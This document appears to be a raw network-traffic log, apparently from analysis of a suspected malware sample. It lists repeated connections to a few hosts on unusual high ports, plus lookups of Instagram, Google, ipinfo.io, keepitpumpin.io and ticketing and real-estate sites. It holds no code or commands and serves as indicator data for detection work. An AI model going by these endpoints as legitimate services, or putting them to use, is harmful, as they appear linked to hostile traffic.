US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.199:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.138:443 content-autofill.googleapis.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 maps.google.com udp
NL 142.250.179.206:443 maps.google.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 172.217.168.202:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 142.251.36.10:443 content-autofill.googleapis.com tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 update.googleapis.com udp
US 68.183.97.45:26080 tcp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.104.255:15484 tcp
US 8.8.8.8:53 111.t.keepitpumpin.io udp
FR 212.83.141.61:8080 111.t.keepitpumpin.io tcp
US 157.230.228.59:20071 tcp
US 157.230.228.59:20071 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 8.8.8.8:53 www.ticketmaster.nl udp
US 151.101.2.87:443 www.ticketmaster.nl tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 115.t.keepitpumpin.io udp
FR 212.83.166.214:8080 115.t.keepitpumpin.io tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 192.241.148.197:19263 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 safebrowsing.googleapis.com udp
NL 142.250.179.202:443 safebrowsing.googleapis.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 maps.google.com udp
US 142.251.36.14:443 maps.google.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ssl.cdn-redfin.com udp
NL 96.16.53.203:443 ssl.cdn-redfin.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 accounts.google.com udp
US 172.217.168.237:443 accounts.google.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.142:443 apis.google.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 157.230.228.59:20071 tcp
US 8.8.8.8:53 www.fnacspectacles.com udp
FR 213.41.41.214:443 www.fnacspectacles.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
US 8.8.8.8:53 www.instagram.com udp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
NL 31.13.64.174:443 www.instagram.com tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 157.230.228.59:20071 tcp
US 68.183.97.45:26080 tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.fnacspectacles.com udp
FR 213.41.41.214:443 www.fnacspectacles.com tcp
US 8.8.8.8:53 update.googleapis.com udp
NL 142.250.179.163:443 update.googleapis.com tcp
US 68.183.97.45:26080 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 157.230.187.97:12307 tcp
US 68.183.97.45:26080 tcp
US 157.230.228.59:20071 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
US 172.217.168.234:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 www.fnacspectacles.com udp
FR 213.41.41.214:443 www.fnacspectacles.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
NL 142.250.179.131:443 ssl.gstatic.com tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 68.183.97.45:26080 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
US 157.230.228.59:20071 tcp
US 157.230.187.97:12307 tcp
US 8.8.8.8:53 www.redfin.com udp
NL 104.80.228.201:443 www.redfin.com tcp
